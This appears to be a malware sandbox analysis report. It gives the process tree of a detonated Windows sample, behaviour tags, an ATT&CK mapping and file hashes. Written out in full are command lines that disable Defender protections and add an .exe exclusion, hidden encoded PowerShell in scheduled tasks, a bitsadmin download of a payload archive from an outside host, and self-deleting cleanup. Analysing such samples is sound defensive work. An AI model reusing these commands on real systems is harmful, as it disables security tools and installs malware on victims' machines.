C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&11⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3212⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6412⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&11⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3212⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6412⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSzceyuEo" /SC once /ST 06:59:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="10⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSzceyuEo"10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSzceyuEo"10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 10:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\kxXwdCM.exe\" tt /site_id 739435 /S" /V1 /F10⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bOoGaaDxESFbryPOAb"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pjifjvbg.bd1\Atomic.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\pjifjvbg.bd1\Atomic.exeC:\Users\Admin\AppData\Local\Temp\pjifjvbg.bd1\Atomic.exe6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hr4oqecv.otc\gcleaner.exe /mixfive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\hr4oqecv.otc\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\hr4oqecv.otc\gcleaner.exe /mixfive6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rwxiqxte.igg\autosubplayer.exe /S & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\rwxiqxte.igg\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\rwxiqxte.igg\autosubplayer.exe /S6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pF1Cp7aJwiPoTuRt -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNSkZ1CRlSRuMwfs -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JFLQwz\JFLQwz.dll" JFLQwz7⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JFLQwz\JFLQwz.dll" JFLQwz8⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"7⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT7⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6850A2AF3DB752004D610004088FF031 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DF757AFB3E66B128A47D430E7FA203E02⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0C514077A3F91FD6A727CF662BEB85BB E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\F4B2.exeC:\Users\Admin\AppData\Local\Temp\F4B2.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\B0A0.exeC:\Users\Admin\AppData\Local\Temp\B0A0.exe1⤵
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\1E01.exeC:\Users\Admin\AppData\Local\Temp\1E01.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7A3B.exeC:\Users\Admin\AppData\Local\Temp\7A3B.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 7A3B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7A3B.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 7A3B.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\A53F.exeC:\Users\Admin\AppData\Local\Temp\A53F.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\BD5C.exeC:\Users\Admin\AppData\Local\Temp\BD5C.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Bootkit
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
4Disabling Security Tools
1Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DMD5
fbb73dd41a90491d150c4f12549da5a5
SHA14396b402d8a05bac2bbc7190ca9e32782ff4af6f
SHA25612686bacfe00b636476d9d8d326a972acae8108dc655cc61ed5a21acb03586fc
SHA512ad786c4c99d3fb6aefc404ef6860f8ad4a97235a23a58ff417337370eabbd4d34ca12ad591ba5834a8c11f14a1d51b00e41a8d76c36007a70df80d30da4584fe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EMD5
97f9fe2d3b32063d3321e7b921635d02
SHA1bbd89fcd4d2ca88f980b9a54b0adfbc25485be23
SHA256985589fe5c72659008dfb6e239eb942f4efbc98a4495ba1e56033606c33197af
SHA5124d731bad606473db899938d4476decdfa4c7db4e628e42242af5ef810eb821fefb42b96bc4655306b570996770a03f0ff697411e7418914f601eef4afad58e7c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DMD5
e813fff8d5d43d31c52e55a0b96d3965
SHA1bc4ac321602f13a989139a597388dfaeda887444
SHA25606841ac82418ce1627385cc7456abab51086a784f7627133ac2d56bcd0fae47c
SHA5122728c68d6ad5fa6a16e13f9f30891e21268d58bfc2a2dcaee2087a04c5f3f2ab1c6581dfb95105e9963d6d008f610c93ab74e4d02210c604b12b777cf7803108
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EMD5
2ab694194715e807fa643a333be548f5
SHA1b81b718c647d99551d7281527652c18d3f000669
SHA256cfba9e001b0a487beb7e0341b08e1cda5872468e7b6831b8f4e9bca12b84a276
SHA5125a339a66a7af7c8416eff46accb43c0a91d7ab1f05c296fea83fbc5454ec998913caf68b44346e061b1653804d698d520d76d4f9595276ffde5a16eb5d7c6958
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
568e59b049157be578b13da25b110351
SHA17f134a0efd5cda9c2898de51504ba159819ede59
SHA25698ff038dffbc25ded38d5041a157dc3e8a14b92394358446db4dc3e6d5593ee6
SHA512c020b4d1bef1bf2be6820dc904b61b314f24dc1809a7e97ab1e3d6ba217ee7b282f70def44879effec54425f000403175725f219eb4d165be422ab104902dc90
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
568e59b049157be578b13da25b110351
SHA17f134a0efd5cda9c2898de51504ba159819ede59
SHA25698ff038dffbc25ded38d5041a157dc3e8a14b92394358446db4dc3e6d5593ee6
SHA512c020b4d1bef1bf2be6820dc904b61b314f24dc1809a7e97ab1e3d6ba217ee7b282f70def44879effec54425f000403175725f219eb4d165be422ab104902dc90
-
C:\Users\Admin\AppData\Local\Temp\5.exeMD5
ce31e837ebcd0856a520a76343ec3ec5
SHA1ca3931f935f8b87c2766ed4e2f440694dc63bfbf
SHA2569a64261e29e62cf06652863b49f86b85183ea14302eede53eb075245c70b012b
SHA512fc778da36ad7c17b6bd53f884441f992c6eb56e8502f511c92c533dcc7330bf4a6e6df9d051fa5ed7f913d8dd23a9ee5181ee71843a73c8dcb0a3df4bcf1cc14
-
C:\Users\Admin\AppData\Local\Temp\5.exeMD5
ce31e837ebcd0856a520a76343ec3ec5
SHA1ca3931f935f8b87c2766ed4e2f440694dc63bfbf
SHA2569a64261e29e62cf06652863b49f86b85183ea14302eede53eb075245c70b012b
SHA512fc778da36ad7c17b6bd53f884441f992c6eb56e8502f511c92c533dcc7330bf4a6e6df9d051fa5ed7f913d8dd23a9ee5181ee71843a73c8dcb0a3df4bcf1cc14
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1905815e51282417.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1905815e51282417.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1908b94df837b3158.exeMD5
26c211413dfd432a9ce28c19a67910a1
SHA1dbf2173faa9e35bb9c710e289a247786248fe9e8
SHA256e2a9ab13cd3031c7f5c84180de1f62d5905f87094efd8ab654b5fb7d88860e1b
SHA5124c096e8ed12ebd5ef12b53fb9179fd0c8262837668994a2f2466c61436de95411f05f3af341ac9370448b6e910775b6a3c3a6ddb25850a2b4977c0bc3a3468cd
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1908b94df837b3158.exeMD5
26c211413dfd432a9ce28c19a67910a1
SHA1dbf2173faa9e35bb9c710e289a247786248fe9e8
SHA256e2a9ab13cd3031c7f5c84180de1f62d5905f87094efd8ab654b5fb7d88860e1b
SHA5124c096e8ed12ebd5ef12b53fb9179fd0c8262837668994a2f2466c61436de95411f05f3af341ac9370448b6e910775b6a3c3a6ddb25850a2b4977c0bc3a3468cd
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun191101c1aaa.exeMD5
ae0bb0ef615f4606fbe1f050b6f08ca3
SHA1f69b6d6496d8941ef53bca7c3578ad616cf5a4b1
SHA25603d079303a3164960677e57a587e86c3a5e7736fbde0ab7b9e60c4b8b2e50745
SHA512ec9ac14ac2ef705867c6c1611671c8185f3d3fe671a787840132a337d4bdf1ad3b808aa3ca24eee58bda78bef19e7a2a9ea5299b224bb370622e5072aa790afd
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun191101c1aaa.exeMD5
ae0bb0ef615f4606fbe1f050b6f08ca3
SHA1f69b6d6496d8941ef53bca7c3578ad616cf5a4b1
SHA25603d079303a3164960677e57a587e86c3a5e7736fbde0ab7b9e60c4b8b2e50745
SHA512ec9ac14ac2ef705867c6c1611671c8185f3d3fe671a787840132a337d4bdf1ad3b808aa3ca24eee58bda78bef19e7a2a9ea5299b224bb370622e5072aa790afd
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1917b8fb5f09db8.exeMD5
8a40bac445ecb19f7cb8995b5ae9390b
SHA12a8a36c14a0206acf54150331cc178af1af06d9c
SHA2565da618d0d54f9251a1735057b27f9a5188e2ddd44f53ce35ce69caaf678f26a8
SHA51260678907bd654ff44036abcb4491056a1a2279b21e6ac933d2423362dc59ab1232c67cd93ddb80bfe80decc288eb874e333a8b630bf96a0e723bc654c4e35de6
-
